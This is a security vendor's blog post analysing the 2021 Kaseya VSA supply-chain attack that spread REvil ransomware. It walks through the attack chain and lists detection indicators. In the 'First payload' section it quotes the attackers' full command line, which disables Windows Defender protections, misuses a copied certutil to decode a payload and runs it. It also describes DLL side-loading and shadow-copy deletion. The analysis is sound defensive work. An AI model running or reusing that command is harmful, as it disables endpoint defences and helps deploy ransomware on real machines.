Analysis of REvil Ransomware Attack

Followed by the Solarwinds attack, another supply chain compromise has hit the enterprises during the July 4th holiday weekend. Kaseya MSP — a remote IT management service provider — was compromised to deliver REvil/Sodinokibi ransomware. This attack makes 2021 a big year for such supply chain based attacks.

Although initial analysis estimates 50 Kaseya customers to be affected, the attack had far greater reach of more than 1500 organizations via managed service providers who unwittingly spread the attack to their customers. REvil threat actors initially published a ransom demand for between $50M-$70M in BTC to unlock all encrypted files.

This blog post analyzes the key tactics and techniques used by the Kaseya ransomware and identifies the most important IOCs for the attack.

The Attack Chain

How Kayera typically comprise the network and ‘get in’ is beyond the scope of this blog (the CVE is now tracked at CVE-2021–30116). Let’s assume it makes its way in and dive into the kill chain.

Distribution via Kaseya agent

Kaseya VSA(Virtual Systems Administrator) is a remote monitoring and management tool for networks and endpoints for enterprises and MSPs. Threat actors breached the Kaseya network and leveraged the VSA software update mechanism to deliver the initial payload via Kaseya agent.

C:\Program Files (x86)/Kaseya/{ID}/AgentMon.exe

REvil Ransomware Attack Chain

First payload

The launch method for initial payload exhibited definitive steps to avoid detection. Note the following command triggered by the Kaseya agent:

“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

a. The command first delays execution till a predetermined time so that the ransomware attack can be synchronized.

b. Following the delay, it attempts to disable various features of Windows Defender including Real-time Monitoring.

c. Additionally, protection features such as DisableIOAVProtection, DisableScriptScanning are disabled too, which ensures that subsequently dropped payload will not be scanned or blocked.

d. It also disables the SubmitSamplesConsent option to avoid payloads being submitted to Microsoft.

e. Later the command makes a copy of certutil.exe and appends random content to evade masquerading based detection.

f. It decodes the agent.crt into agent.exe which then drops the second stage of payloads.

g. Finally it deletes the intermediate binaries such as copied certutil.exe (cert.exe) and agent.crt.

Second payload

Second stage also exhibits intentional behavior to stay under the radar. The decoded agent.exe has two embedded binaries.

The first one is legitimate, being simply an older version of Windows Defender binary (msmpeng.exe). The second binary is the REvil encryptor dll (mpsvc.dll). This enables side-loading of mpsvc.dll into msmpeng.exe.

Note that multiple stages indicate discrete attempts to leverage Windows system tools (LOLBins) such as certutil.exe and msmpeng.exe.

The encryptor DLL (mpsvc.dll) then exhibits typical ransomware behavior such as deleting volume shadow copies using WMIC and encrypting user data files. Similar to previously seen REvil/Sodinokibi behavior, the files are encrypted in place and are renamed to a randomly generated extension.

Detection

The Kaseya attack progression deviates from several system integrity and behavior baseline. Here are a few prominent IOCs that the attack exhibits. Each IOC is illustrated in the context of the full attack storyboard automatically generated by Confluera CxDR.

  1. Disabling Windows Defender protection — PowerShell cmdlet Set-MpPreferences is commonly used to disable protection features.
Detection: Windows Defender protection disabled

2. certutil.exe copied and modified. — Later it is used to decode the payload into an executable. A process generating executable with decode parameter is more often than not a malicious indicator.

Detection: System utility copied — certutil.exe
Detection: Payload agent.crt is decoded into agent.exe

3. msmpeng.exe masquerading as Windows Defender — A system process such as msmpeng.exe should not be started from atypical locations such as C:\Windows. Additionally, genuine Windows Defender (msmpeng.exe) should always run with system SID.

Detection: Process name msmpeng.exe is masquerading as Windows Defender
Detection: Process name msmpeng.exe matches system process name but started with non-system SID

4. Deleting shadow copies and encrypting files — Multiple user data files being renamed or deleted in a short amount of time are common indicators of ransomware behavior.

Detection: Deleting volume shadow copies using WMIC
Detection: Process renamed multiple user data files in short duration

Will it Re-REvil?

Will REvil resurface? Absolutely!

  • Threat actors have realized that supply chain attacks are the new gold mines. MSPs such as Kaseya or IT infrastructure management platforms such as Solarwinds already have agent software running through the organizations. Once breached, these deployments are already primed to distribute malware.
  • When service providers have customers who are MSPs themselves, threat actors can move downstream and expand their foothold. These service providers are more susceptible to supply chain attacks. Case in point, another zero-day vulnerability was recently disclosed for Solarwinds products.
  • Sophisticated attacks are no longer reserved for nation-state backed actors. Commercial threat actor groups have started leveraging sophisticated attacks that allow them wider malware distributions and larger ransom demands.

Early detection is key for advanced ransomware attacks

As demonstrated by the Keseya breach, a network can be compromised from unexpected threat vectors and, as always, a defense-in-depth posture is prudent. However, the traditional EDR, NGAV and NDR approach are just not detecting these attacks early enough (as exemplified by several recent attacks). It is essential to include continuous, real-time, multi-signal threat storyboarding in the core security architecture to sniff out multi-stage attacks in early stages.

  • Build Context: Ransomware attacks are inherently multi-stage. Gaining early visibility into the causal chain of payload downloads, execution in stages and possible lateral movements provides vital intelligence and can shift control into the responders’ hands.
  • Pay Attention to Weak Signals: Defense evasion attempts could be lost in the sea of alerts. Contextualizing these weak signals in combination with IOCs paints a far clearer picture that allows early and timely interception
  • Real time Detection: Ransomware behaviors typically involve coordinated backup removal and encryption. Real time detection is critically important to respond in a timely fashion.
  • Infrastructure-wide coverage: Threat actors ensure a wide foothold into the infrastructure before ransomware springs into action. Consequently, visibility provided by a modern detection and response solution across the infrastructure becomes essential to assess the breach.

The analysis of the ransomware in this blog was conducted using Confluera CxDR. Confluera CxDR is designed to detect, investigate and respond multi-stage attacks including ransomware via an intuitive real-time threat storyboarding. The intent based graphs provide context and storyboarding for a chain of actions in real time across workloads, network and cloud.

Stay safe out there!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store